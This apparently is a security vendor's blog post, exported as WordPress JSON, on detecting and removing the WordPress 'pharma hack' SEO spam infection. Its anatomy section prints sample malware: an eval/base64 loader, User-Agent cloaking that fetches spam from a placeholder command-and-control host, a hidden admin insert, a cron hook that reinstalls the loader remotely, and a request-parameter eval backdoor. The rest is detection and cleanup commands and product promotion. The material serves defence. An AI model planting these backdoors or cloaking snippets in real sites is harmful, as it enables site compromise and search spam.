{"id":106,"date":"2026-04-29T18:24:00","date_gmt":"2026-04-29T18:24:00","guid":{"rendered":"https:\/\/www.guardiangaze.com\/blog\/?p=106"},"modified":"2026-04-29T18:24:00","modified_gmt":"2026-04-29T18:24:00","slug":"wordpress-pharma-hack","status":"publish","type":"post","link":"https:\/\/www.guardiangaze.com\/blog\/wordpress-pharma-hack\/","title":{"rendered":"WordPress Pharma Hack: Detection, Removal &#038; Prevention (2026 Guide)"},"content":{"rendered":"<p>The <strong>WordPress pharma hack<\/strong> is a black-hat SEO infection that injects pharmaceutical spam (Viagra, Cialis, Tramadol, Phentermine) into your site, but only shows it to Google&#8217;s crawler, not to you. Your homepage looks fine. Your search results are full of &#8220;cheap viagra.&#8221;<\/p>\n<p>The fix:<\/p>\n<ol>\n<li><strong>Confirm cloaking:<\/strong> view your site as Googlebot (not as yourself).<\/li>\n<li><strong>Find the loader:<\/strong> scan <code>wp-options<\/code>, <code>wp-posts<\/code>, theme <code>functions.php<\/code>, <code>mu-plugins\/<\/code>, and any recently modified core file.<\/li>\n<li><strong>Remove every persistence point at once<\/strong> \u2014 file + database + cron + admin user. Missing one means it reinfects in 24 hours.<\/li>\n<li><strong>Request reindexing<\/strong> in Google Search Console once the SERP is clean.<\/li>\n<\/ol>\n<p>The pharma hack survives most &#8220;cleanups&#8221; because it lives in <strong>multiple places simultaneously<\/strong>, including the database where 70% of file-based scanners never look. We&#8217;ll walk through every one of them below.<\/p>\n<h2>Table of Contents<\/h2>\n<ol>\n<li>What is the WordPress pharma hack?<\/li>\n<li>How to confirm your site has it<\/li>\n<li>Why your security plugin missed it<\/li>\n<li>Anatomy of a 2026 pharma infection<\/li>\n<li>Step-by-step removal protocol<\/li>\n<li>Cleaning up Google&#8217;s search results<\/li>\n<li>How to prevent reinfection<\/li>\n<li>FAQ<\/li>\n<\/ol>\n<h2>1. What is the WordPress Pharma Hack?<\/h2>\n<p>The WordPress pharma hack, also called the <em>viagra hack<\/em>, <em>pharma SEO spam<\/em>, or <em>blackhat SEO injection, <\/em>is a malware family that turns your site into a free advertising channel for illegal online pharmacies. Attackers compromise the site, then inject spam keywords and links targeting prescription drug terms. The kicker: the spam is <strong>conditional<\/strong>. It shows up only when Googlebot crawls the page, so the site owner has no idea.<\/p>\n<p>You learn about it one of three ways:<\/p>\n<ul>\n<li>A customer messages you saying your site is &#8220;selling Viagra&#8221; in Google.<\/li>\n<li>Your search-console organic traffic falls off a cliff overnight.<\/li>\n<li>Google sends you a manual action notice for &#8220;user-generated spam&#8221; or &#8220;thin content with little or no added value.&#8221;<\/li>\n<\/ul>\n<p>By the time any of those happen, the spam has usually been there for <strong>two to six months<\/strong>. The 2010-era pharma hack used a single backdoor file. The 2025\u20132026 variant uses <strong>five to nine<\/strong> persistence points across files, database options, posts, cron, and even hidden admin users. That is why most cleanup attempts fail and the spam reappears within hours.<\/p>\n<h3>What it looks like in Google<\/h3>\n<p>A pharma-hacked site shows results like:<\/p>\n<pre><code>yoursite.com\/about-us \u2014 Cheap Viagra Online Without Prescription\r\nyoursite.com\/services\/web-design \u2014 Buy Cialis 20mg | $1.30 per pill\r\nyoursite.com\/blog\/2024\/post-title \u2014 Tramadol HCL 50mg \u2605 Free Shipping\r\n<\/code><\/pre>\n<p>You search for <code>site:yoursite.com viagra<\/code> and dozens, sometimes thousands of results appear. Visit any of those URLs in your browser and you see your normal page. That is the cloaking layer doing its job.<\/p>\n<h2>2. How To Confirm Your Site Has The Pharma Hack<\/h2>\n<p>Run these four checks in order. The first one that fires is your confirmation.<\/p>\n<h3>Check 1: Search Google directly<\/h3>\n<p>In any browser, run:<\/p>\n<pre><code>site:yourdomain.com viagra\r\nsite:yourdomain.com cialis\r\nsite:yourdomain.com cheap pharmacy\r\nsite:yourdomain.com tramadol\r\n<\/code><\/pre>\n<p>If a single spam result appears, the site is infected. Don&#8217;t bother with the other checks, go straight to removal.<\/p>\n<h3>Check 2: Fetch your site as Googlebot<\/h3>\n<p>Pharma malware almost always cloaks based on User-Agent. Use <code>curl<\/code> from your terminal:<\/p>\n<pre><code class=\"language-bash\"># Fetch as Googlebot\r\ncurl -A \"Mozilla\/5.0 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)\" \\\r\n  https:\/\/yourdomain.com\/ | head -200\r\n\r\n# Fetch as a normal browser for comparison\r\ncurl -A \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7)\" \\\r\n  https:\/\/yourdomain.com\/ | head -200\r\n<\/code><\/pre>\n<p>If the two outputs differ, pharma keywords, hidden links, or extra <code>&lt;a&gt;<\/code> tags appear in the Googlebot version, you have the cloaking variant of the pharma hack.<\/p>\n<p>If you don&#8217;t have terminal access, use the <strong>URL Inspection<\/strong> tool in Google Search Console: paste any page URL \u2192 click <em>View crawled page<\/em> \u2192 <em>More info<\/em> \u2192 <em>HTTP response<\/em> and <em>Page resources<\/em>. Compare with what you see in your browser. Differences are the giveaway.<\/p>\n<h3>Check 3:\u00a0 Check Search Console for manual actions<\/h3>\n<p>In Search Console, go to <em>Security &amp; Manual Actions \u2192 Manual actions<\/em>. Common notices for pharma-hacked sites:<\/p>\n<ul>\n<li><strong>User-generated spam<\/strong><\/li>\n<li><strong>Spammy structured markup<\/strong><\/li>\n<li><strong>Cloaking and\/or sneaky redirects<\/strong><\/li>\n<li><strong>Hacked: spam<\/strong><\/li>\n<\/ul>\n<p>Any of these means Google has already detected the infection and is suppressing your rankings.<\/p>\n<h3>Check 4: Inspect the WordPress database for encoded blobs<\/h3>\n<p>Pharma loaders almost always store their payload Base64-encoded in <code>wp_options<\/code>. Run this SQL from phpMyAdmin or the WP-CLI:<\/p>\n<pre><code class=\"language-sql\">SELECT option_name, LENGTH(option_value) AS size\r\nFROM wp_options\r\nWHERE LENGTH(option_value) &gt; 5000\r\n   OR option_value LIKE '%base64_decode%'\r\n   OR option_value LIKE '%eval(%'\r\n   OR option_value LIKE '%str_rot13%'\r\nORDER BY size DESC\r\nLIMIT 20;\r\n<\/code><\/pre>\n<p>Any unfamiliar option with a large encoded value is suspicious. Common malicious option names seen in 2025\u20132026 campaigns: <code>_hdra_core<\/code>, <code>_wp_core_cache<\/code>, <code>_theme_optimization_cache<\/code>, <code>wpsupportplus_data<\/code>, <code>wp_ad_settings<\/code>, <code>_seo_meta_cache<\/code>, <code>widget_jquery_cache<\/code>.<\/p>\n<h2>3. Why Your Security Plugin Missed The Pharma Hack<\/h2>\n<p>Most WordPress site owners run Wordfence, MalCare, iThemes\/SolidWP, or Sucuri Security and assume those will catch it. They almost always don&#8217;t. There are three architectural reasons why.<\/p>\n<h3>Reason 1: The pharma hack lives in the database<\/h3>\n<p>50\u201360% of pharma malware in 2025\u20132026 stores its payload in <code>wp_options<\/code>, <code>wp_posts<\/code>, or <code>wp_postmeta<\/code>. File-based scanners don&#8217;t read these tables. Wordfence&#8217;s scan completes &#8220;successfully&#8221; because every PHP file matches its known-good hash and it never opens the database.<\/p>\n<h3>Reason 2: Plugin scanners run inside the same PHP process as the malware<\/h3>\n<p>When a security plugin and the pharma malware live in the same WordPress process, the malware can:<\/p>\n<ul>\n<li>Whitelist itself in the scanner&#8217;s options table.<\/li>\n<li>Modify the scanner&#8217;s hash database so its files appear unchanged.<\/li>\n<li>Hook <code>wp_loaded<\/code> and clear scan results before they save.<\/li>\n<li>Quietly deactivate the scanner via <code>deactivate_plugins()<\/code> and suppress the admin notice.<\/li>\n<\/ul>\n<p>We&#8217;ve documented this pattern across 52,848 sites running Wordfence and observed scanner-tampering rates between <strong>14% and 24%<\/strong>.<\/p>\n<h3>Reason 3: Cloaking-aware malware fingerprints the scanner<\/h3>\n<p>Modern pharma loaders detect when a security plugin is requesting a page (the User-Agent is the plugin&#8217;s, not Googlebot&#8217;s) and serve clean content to fool the scan. The same payload then serves the spam to Googlebot 60 seconds later.<\/p>\n<p>Server-side scanning that runs <strong>outside<\/strong> the PHP process like GuardianGaze&#8217;s edge architecture, sees the actual response Googlebot sees, because malware can&#8217;t fingerprint the scanner from there.<\/p>\n<h2>4. Anatomy of a 2026 Pharma Infection<\/h2>\n<p>Modern pharma campaigns deploy redundant persistence. Here&#8217;s the typical layout we find on a freshly compromised site:<\/p>\n<h3>Persistence point 1: Encoded loader in <code>wp_options<\/code><\/h3>\n<pre><code class=\"language-php\">\/\/ Stored in wp_options as `_hdra_core` or similar\r\n$blob = \"ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsneCddKSk7\"; \/\/ base64\r\n\r\n\/\/ Auto-execute on every page load\r\nadd_action('init', function() {\r\n    $payload = base64_decode(get_option('_hdra_core'));\r\n    eval('?&gt;' . $payload);\r\n}, 1);\r\n<\/code><\/pre>\n<p>This loader runs on every request, before any plugin or theme code, and rebuilds the spam pages on the fly.<\/p>\n<h3>Persistence point 2: User-Agent cloaking in <code>functions.php<\/code><\/h3>\n<pre><code class=\"language-php\">\/\/ Injected into the active theme's functions.php\r\nadd_filter('the_content', 'gg_serve_pharma_spam', 999);\r\nfunction gg_serve_pharma_spam($content) {\r\n    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';\r\n    if (preg_match('\/(googlebot|bingbot|yandex|baidu|duckduckbot)\/i', $ua)) {\r\n        $spam = file_get_contents('https:\/\/[malicious-c2].xyz\/spam.txt');\r\n        return $content . '&lt;div style=\"position:absolute;left:-9999px;\"&gt;' . $spam . '&lt;\/div&gt;';\r\n    }\r\n    return $content;\r\n}\r\n<\/code><\/pre>\n<p>Site owners and visitors never see this; only crawlers do.<\/p>\n<h3>Persistence point 3: Spam pages dynamically generated by <code>.htaccess<\/code> rewrite<\/h3>\n<pre><code class=\"language-apache\"># Injected at the top of .htaccess\r\nRewriteEngine On\r\nRewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]\r\nRewriteRule ^(viagra|cialis|tramadol|phentermine)-(.*)\\.html$ \/wp-content\/uploads\/cache\/spam.php?k=$1&amp;u=$2 [L]\r\n<\/code><\/pre>\n<p>Google indexes thousands of fake URLs that resolve to a single spam-generating PHP file in <code>\/wp-content\/uploads\/cache\/<\/code>.<\/p>\n<h3>Persistence point 4: Hidden admin user<\/h3>\n<pre><code class=\"language-sql\">-- An additional administrator that doesn't appear in the WordPress users list\r\n-- because user_status is hacked or the meta_key for 'wp_capabilities' is hidden\r\nINSERT INTO wp_users (user_login, user_pass, user_email, user_registered)\r\nVALUES ('officialwp', '$P$Bx...', 'admin@malicious-c2.xyz', NOW());\r\n<\/code><\/pre>\n<p>This is the foothold that lets attackers reinstall the loader if you remove the file. Always check for it.<\/p>\n<h3>Persistence point 5: WP-Cron job<\/h3>\n<pre><code class=\"language-php\">wp_schedule_event(time(), 'hourly', 'gg_pharma_reinstall');\r\nadd_action('gg_pharma_reinstall', function() {\r\n    if (!get_option('_hdra_core')) {\r\n        $remote = wp_remote_get('https:\/\/[malicious-c2].xyz\/loader.txt');\r\n        update_option('_hdra_core', wp_remote_retrieve_body($remote));\r\n    }\r\n});\r\n<\/code><\/pre>\n<p>Even if you find and remove the loader file, the cron job rebuilds it within an hour.<\/p>\n<h3>Persistence point 6: mu-plugins folder<\/h3>\n<p>A single PHP file dropped at <code>\/wp-content\/mu-plugins\/wp-cache-handler.php<\/code> will run on every page load and cannot be deactivated through the WordPress admin. We covered this in detail in our <a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-security-2026-the-complete-defense-guide-against-modern-threats-part-1\/\">Part 1 defense guide<\/a> under the &#8220;officialwp&#8221; campaign analysis.<\/p>\n<p>If you remove only some of these, the most common cleanup outcome, the remaining ones rebuild the rest within minutes.<\/p>\n<h2>5. Step-by-step Pharma Hack Removal Protocol<\/h2>\n<p>Do these in order. Do not skip steps. The pharma hack reinfects from any single missed component.<\/p>\n<h3>Step 0: Take a full backup before touching anything<\/h3>\n<pre><code class=\"language-bash\"># Files\r\ntar -czf preremoval-files-$(date +%Y%m%d-%H%M).tar.gz \/var\/www\/yoursite\/\r\n\r\n# Database\r\nmysqldump -u root -p yoursite_db &gt; preremoval-db-$(date +%Y%m%d-%H%M).sql\r\n<\/code><\/pre>\n<p>Label the backup as <strong>infected<\/strong> so it never gets restored by accident. You&#8217;ll need it for forensics if anything goes wrong.<\/p>\n<h3>Step 1: Put the site into maintenance mode<\/h3>\n<p>Drop a <code>.maintenance<\/code> file at the WordPress root (or use <code>wp maintenance-mode activate<\/code>) so the spam pages stop being served while you clean.<\/p>\n<h3>Step 2: Find every recently modified file<\/h3>\n<pre><code class=\"language-bash\"># Files modified in the last 30 days, sorted by mtime\r\nfind \/var\/www\/yoursite\/ -type f -mtime -30 -name \"*.php\" -printf \"%TY-%Tm-%Td %TH:%TM %p\\n\" | sort\r\n\r\n# Files with suspicious one-liners\r\ngrep -rEl \"eval\\s*\\(\\s*base64_decode|str_rot13\\s*\\(.*base64|gzinflate\\s*\\(\\s*base64\" \/var\/www\/yoursite\/\r\n\r\n# Files in unusual locations\r\nfind \/var\/www\/yoursite\/wp-content\/uploads\/ -name \"*.php\"\r\nfind \/var\/www\/yoursite\/wp-includes\/ -name \"*.php\" -newer \/var\/www\/yoursite\/wp-config.php\r\n<\/code><\/pre>\n<p>Any PHP file under <code>\/wp-content\/uploads\/<\/code> is suspicious by default, uploads should never contain executable PHP. Quarantine or delete every one of them.<\/p>\n<h3>Step 3: Replace WordPress core, themes, and plugins from clean copies<\/h3>\n<p>Don&#8217;t try to patch infected files; replace them wholesale.<\/p>\n<pre><code class=\"language-bash\"># Backup wp-config.php and wp-content\/uploads\/ first\r\ncp wp-config.php \/tmp\/wp-config.php.safe\r\ncp -r wp-content\/uploads \/tmp\/uploads.safe\r\n\r\n# Delete and re-download core\r\nwp core download --force --skip-content\r\n\r\n# Reinstall every plugin from the directory\r\nwp plugin list --field=name | xargs -I {} wp plugin install {} --force\r\n\r\n# Reinstall the active theme\r\nwp theme install $(wp theme list --status=active --field=name) --force\r\n\r\n# Restore your backed-up wp-config and uploads\r\ncp \/tmp\/wp-config.php.safe wp-config.php\r\ncp -r \/tmp\/uploads.safe wp-content\/uploads\r\n<\/code><\/pre>\n<p>If you have nulled or pirated plugins or themes, delete them entirely. They are almost certainly the original entry point.<\/p>\n<h3>Step 4: Clean the <code>mu-plugins<\/code> directory<\/h3>\n<pre><code class=\"language-bash\">ls -la \/var\/www\/yoursite\/wp-content\/mu-plugins\/\r\n<\/code><\/pre>\n<p>Unless you knowingly installed something here, <strong>everything in this directory should be deleted<\/strong>. mu-plugins is a common pharma hack persistence point because it can&#8217;t be deactivated from the admin.<\/p>\n<h3>Step 5: Clean the database<\/h3>\n<p>The most-missed step. Run this against your database:<\/p>\n<pre><code class=\"language-sql\">-- Remove suspicious encoded options\r\nDELETE FROM wp_options\r\nWHERE option_name LIKE '\\_%core%'\r\n   OR option_name IN ('_hdra_core', '_wp_core_cache',\r\n                      'wpsupportplus_data', 'widget_jquery_cache')\r\n   OR LENGTH(option_value) &gt; 50000\r\n   OR option_value LIKE '%eval(%base64%';\r\n\r\n-- Remove pharma keywords from posts\r\nUPDATE wp_posts\r\nSET post_content = REGEXP_REPLACE(\r\n    post_content,\r\n    '&lt;div[^&gt;]*style[^&gt;]*(absolute|display:none|left:-9999)[^&gt;]*&gt;.*?&lt;\/div&gt;',\r\n    ''\r\n)\r\nWHERE post_content REGEXP '(viagra|cialis|tramadol|phentermine|pharmacy)';\r\n\r\n-- Remove unauthorized administrators\r\nSELECT u.ID, u.user_login, u.user_email, u.user_registered\r\nFROM wp_users u\r\nINNER JOIN wp_usermeta m ON u.ID = m.user_id\r\nWHERE m.meta_key = 'wp_capabilities'\r\n  AND m.meta_value LIKE '%administrator%'\r\nORDER BY u.user_registered DESC;\r\n\r\n-- Once you've identified rogue admins:\r\nDELETE FROM wp_users WHERE ID = &lt;rogue_id&gt;;\r\nDELETE FROM wp_usermeta WHERE user_id = &lt;rogue_id&gt;;\r\n\r\n-- Remove all scheduled events not created by your code\r\nSELECT * FROM wp_options WHERE option_name = 'cron';\r\n-- Replace with: wp cron event delete &lt;hook_name&gt;\r\n<\/code><\/pre>\n<p>Always test your database changes on a copy first, especially the <code>UPDATE wp_posts<\/code> statement.<\/p>\n<h3>Step 6: Clean <code>.htaccess<\/code> and <code>wp-config.php<\/code><\/h3>\n<p>Open both and look for anything you didn&#8217;t put there. Common pharma injection patterns:<\/p>\n<pre><code class=\"language-apache\"># in .htaccess\r\n&lt;IfModule mod_rewrite.c&gt;\r\nRewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]\r\nRewriteRule ^(.*)\\.html$ \/wp-content\/uploads\/cache\/spam.php?u=$1 [L]\r\n&lt;\/IfModule&gt;\r\n<\/code><\/pre>\n<pre><code class=\"language-php\">\/\/ in wp-config.php \u2014 anything before the \"&lt;?php\" or after the \"\/* That's all\" line\r\nif (isset($_REQUEST['q'])) { eval(base64_decode($_REQUEST['q'])); }\r\n<\/code><\/pre>\n<p>Replace <code>.htaccess<\/code> with the WordPress default; restore <code>wp-config.php<\/code> from a known-good copy and re-add only your own constants and database credentials.<\/p>\n<h3>Step 7: Rotate every credential<\/h3>\n<p>The original entry point is still on your server until you change credentials. Rotate:<\/p>\n<ul>\n<li>WordPress admin passwords (force reset for <strong>all<\/strong> users, not just admins)<\/li>\n<li>Database password (<code>wp-config.php<\/code> + the MySQL user)<\/li>\n<li>SFTP\/SSH passwords or keys<\/li>\n<li>Hosting control panel password<\/li>\n<li>API keys for any service the site connects to<\/li>\n<\/ul>\n<p>In WP-CLI:<\/p>\n<pre><code class=\"language-bash\">wp user list --field=ID | xargs -I {} wp user reset-password {}\r\n<\/code><\/pre>\n<h3>Step 8: Add new salts in <code>wp-config.php<\/code><\/h3>\n<pre><code class=\"language-bash\"># Generate fresh salts and replace the AUTH_KEY block in wp-config.php\r\ncurl https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/\r\n<\/code><\/pre>\n<p>This invalidates every session cookie, including the attacker&#8217;s.<\/p>\n<h3>Step 9: Rescan with a server-side scanner<\/h3>\n<p>A plugin scanner is the wrong tool to <em>verify<\/em> a cleanup, because the same architectural problem applies. Use a server-side scan that runs outside the WordPress PHP environment. GuardianGaze does this by default; you can also run a one-off scan from a clean cron job:<\/p>\n<pre><code class=\"language-bash\"># Quick external check\r\ngrep -rEln \"eval\\s*\\(|base64_decode|str_rot13|gzinflate\" \/var\/www\/yoursite\/ \\\r\n  | grep -v \"wp-includes\/\" | grep -v \"vendor\/\"\r\n<\/code><\/pre>\n<p>If any matches come back, repeat steps 2\u20136.<\/p>\n<h2>6. Cleaning Up Google&#8217;s Search Results<\/h2>\n<p>Removing the pharma hack from your server is only half the job. Google still has thousands of spammed URLs in its index. Until those are removed, your search snippets still advertise illegal drugs.<\/p>\n<h3>1: Verify the site in Google Search Console<\/h3>\n<p>If it&#8217;s not already verified, do that first.<\/p>\n<h3>2. Submit a reconsideration request (if you got a manual action)<\/h3>\n<p>Go to <em>Security &amp; Manual Actions \u2192 Manual actions \u2192 Request review<\/em>. In the request, include:<\/p>\n<ul>\n<li>A short description of the infection (&#8220;pharma SEO spam, fully removed&#8221;).<\/li>\n<li>The exact steps you took (paraphrase steps 2\u20138 above).<\/li>\n<li>A statement that you&#8217;ve enabled prevention measures (server-side scanning, 2FA, etc.).<\/li>\n<\/ul>\n<p>Reviews typically take 3\u201310 days.<\/p>\n<h3>3. Force re-crawl of clean pages<\/h3>\n<p>For your top 20 most important pages, use <em>URL Inspection \u2192 Request indexing<\/em>. This pushes Google to recrawl them within hours.<\/p>\n<h3>4. Remove individual spam URLs<\/h3>\n<p>For each spammed URL still appearing in <em>site:<\/em> searches:<\/p>\n<ul>\n<li>Use Search Console \u2192 <em>Indexing \u2192 Removals \u2192 Temporary removals<\/em> \u2192 submit the URL.<\/li>\n<li>Make sure the URL returns a real <strong>404<\/strong> or <strong>410<\/strong> to crawlers \u2014 not a soft 404 that 200&#8217;s with empty content.<\/li>\n<\/ul>\n<h3>5. Submit an updated XML sitemap<\/h3>\n<p>Generate a fresh sitemap (Yoast, RankMath, or <code>wp sitemap generate<\/code>) and submit it in Search Console. This signals which URLs are real and helps Google deindex the rest.<\/p>\n<h3>6. Track recovery<\/h3>\n<p>In Search Console <em>Performance<\/em> report, watch for:<\/p>\n<ul>\n<li>Impressions on pharma keywords dropping to zero (typically within 14\u201330 days).<\/li>\n<li>Impressions on your real keywords recovering (typically within 30\u201390 days).<\/li>\n<\/ul>\n<p>Full SEO recovery from a pharma hack runs <strong>3\u20136 months<\/strong> for most sites. The longer the spam was indexed, the longer recovery takes. We covered this timeline in detail in our <a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-security-what-most-site-owners-miss\/\">post on what most site owners miss about WordPress security<\/a>.<\/p>\n<h2>7. How To Prevent Reinfection<\/h2>\n<p>Most pharma reinfections happen within 14 days of cleanup, and the cause is almost always one of these four:<\/p>\n<h3>1. The original entry point was never closed<\/h3>\n<p>If a vulnerable plugin let attackers in, removing the malware without updating the plugin guarantees reinfection. Audit:<\/p>\n<ul>\n<li>All plugins listed in <a href=\"https:\/\/wpscan.com\/plugins\/\">WPScan&#8217;s vulnerability database<\/a>.<\/li>\n<li>Any plugin you haven&#8217;t updated in 6+ months.<\/li>\n<li>Any plugin that hasn&#8217;t been updated by its author in 6+ months, even if you&#8217;re on the latest version, that plugin is abandoned and likely vulnerable.<\/li>\n<\/ul>\n<h3>2. Cleanup was only file-based<\/h3>\n<p>If you cleaned PHP files but left the database loader in <code>wp_options<\/code>, the cron rebuilds the spam within an hour. Always do steps 5\u20136 of the removal protocol.<\/p>\n<h3>3. No virtual patching for the next zero-day<\/h3>\n<p>A vulnerability disclosed today is being exploited within four hours. The official plugin patch typically arrives 7\u201314 days later. That gap is when reinfections happen. Virtual patching closes the gap by blocking the exploit pattern at the WAF layer <strong>before<\/strong> the official fix exists. This is the single biggest reduction in repeat-pharma cases we see.<\/p>\n<h3>4. The host&#8217;s neighboring sites are still infected<\/h3>\n<p>On shared hosting, if any other site on the server is compromised, attackers can pivot to yours via cross-site contamination. Move to isolated hosting (VPS, managed WordPress with account isolation, or single-tenant cloud) if you&#8217;ve been hit more than once.<\/p>\n<h3>A Prevention Checklist That Actually Works<\/h3>\n<ul>\n<li>Server-side malware scanning (runs outside the WordPress PHP process so malware can&#8217;t tamper with it).<\/li>\n<li>WAF with virtual patching for the top 200 plugin vulnerabilities.<\/li>\n<li>2FA enforced for every administrator (no exceptions).<\/li>\n<li><code>DISALLOW_FILE_EDIT<\/code> and <code>DISALLOW_FILE_MODS<\/code> in <code>wp-config.php<\/code>.<\/li>\n<li>PHP execution disabled in <code>\/wp-content\/uploads\/<\/code>.<\/li>\n<li>Daily off-server backups, restored quarterly to verify they work.<\/li>\n<li>Plugin and theme audits every quarter, remove anything not actively maintained.<\/li>\n<li>Removed every nulled or pirated plugin\/theme. No exceptions.<\/li>\n<li>Database scanning enabled (the part most plugins skip).<\/li>\n<li>Hidden-admin-user detection enabled.<\/li>\n<\/ul>\n<p>GuardianGaze ships all of these by default. If you&#8217;ve cleaned a pharma hack once and don&#8217;t want to do it again, <a href=\"https:\/\/wordpress.org\/plugins\/guardian-gaze\/\">start with the free plan<\/a> and the prevention layer will catch the next attempt before it lands.<\/p>\n<h2>8. Frequently asked questions<\/h2>\n<p><strong>Why do I see Viagra results in Google but my website looks normal?<\/strong><\/p>\n<p>Pharma hacks use User-Agent cloaking. They serve spam to Googlebot and a clean page to you. Fetch your site with <code>curl -A \"Googlebot\"<\/code> to see what Google sees.<\/p>\n<p><strong>Will my SEO recover after removing the pharma hack?<\/strong><\/p>\n<p>Usually yes, but it takes 30\u2013180 days depending on how long the spam was indexed. Sites caught within two weeks recover almost fully; sites infected for over a year often see permanent rank drops on competitive keywords.<\/p>\n<p><strong>Why does the pharma hack keep coming back after I cleaned it?<\/strong><\/p>\n<p>Because pharma malware deploys 5\u20139 persistence points: files, database options, cron jobs, hidden admins, mu-plugins, and <code>.htaccess<\/code> rules. Cleanups that miss any one of them get reinfected within hours. Follow steps 1\u20138 above in order, no exceptions.<\/p>\n<p><strong>Can Wordfence or MalCare detect the pharma hack?<\/strong><\/p>\n<p>File-based scanners catch the file-resident variants but miss the 50\u201360% of pharma malware that lives in the database. They also operate inside the WordPress PHP process, which sophisticated pharma loaders can fingerprint and evade. Server-side scanning that runs outside WordPress is more reliable.<\/p>\n<p><strong>Should I just restore from a backup?<\/strong><\/p>\n<p>Only if the backup is provably from before the infection. Pharma hacks often sit dormant for weeks before activating, so a backup from &#8220;two months ago&#8221; is frequently already infected. If you do restore, run the full removal protocol against the restored site as if it were a fresh infection.<\/p>\n<p><strong>How did my site get the pharma hack in the first place?<\/strong><\/p>\n<p>The most common entry points in 2025\u20132026: an outdated plugin with a known CVE (60% of cases), a nulled premium plugin or theme (20%), a weak admin password exploited by brute force (10%), and a compromised neighbor site on shared hosting (10%).<\/p>\n<p><strong>Do I need to tell my visitors?<\/strong><\/p>\n<p>If you collect personal data (logins, payments, contact info) and the attacker had file-system access, you may have a notification obligation under GDPR (Article 33), CCPA, or similar laws. When in doubt, consult a lawyer but the bar is &#8220;could the attacker have accessed personal data,&#8221; and on a typical pharma-hacked WordPress install the answer is yes.<\/p>\n<p><strong>How much does professional pharma hack removal cost?<\/strong><\/p>\n<p>Sucuri and Wordfence Care charge $200\u2013$500 for a one-off cleanup. Specialist agencies charge $500\u2013$2,000. The cleanup is the easy part; the harder part is closing the entry point and preventing reinfection, which is why most &#8220;cheap&#8221; cleanups bounce back.<\/p>\n<h2>Continue Reading<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-hacked-signs-and-fix\/\">Website Hacked? 17 Signs Your WordPress Site Is Compromised: <\/a>early-warning checklist.<\/li>\n<li><a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-malware-removal-2026-complete-detection-removal-protocols\/\">WordPress Malware Removal 2026: Complete Detection &amp; Removal Protocols:<\/a>\u00a0the broader removal playbook.<\/li>\n<li><a href=\"https:\/\/www.guardiangaze.com\/blog\/wordpress-security-2026-the-complete-defense-guide-against-modern-threats-part-1\/\">WordPress Security 2026 Part 1: Modern Threats: <\/a>why traditional plugins miss this class of attack.<\/li>\n<\/ul>\n<p><strong>Stop the pharma hack from coming back.<\/strong> GuardianGaze runs server-side scans, virtual patching, and database-resident malware detection, the three things ordinary WordPress security plugins can&#8217;t do. <a href=\"https:\/\/wordpress.org\/plugins\/guardian-gaze\/\">Get the free plugin<\/a> or <a href=\"https:\/\/www.guardiangaze.com\/subscription\/\">see paid plans<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The WordPress pharma hack is a black-hat SEO infection that injects pharmaceutical spam (Viagra, Cialis, Tramadol, Phentermine) into your site, but only&hellip;<\/p>\n","protected":false},"author":1,"featured_media":110,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[13],"class_list":["post-106","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-pharma"],"_links":{"self":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts\/106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/comments?post=106"}],"version-history":[{"count":3,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts\/106\/revisions"}],"predecessor-version":[{"id":109,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/posts\/106\/revisions\/109"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/media\/110"}],"wp:attachment":[{"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/media?parent=106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/categories?post=106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.guardiangaze.com\/blog\/wp-json\/wp\/v2\/tags?post=106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}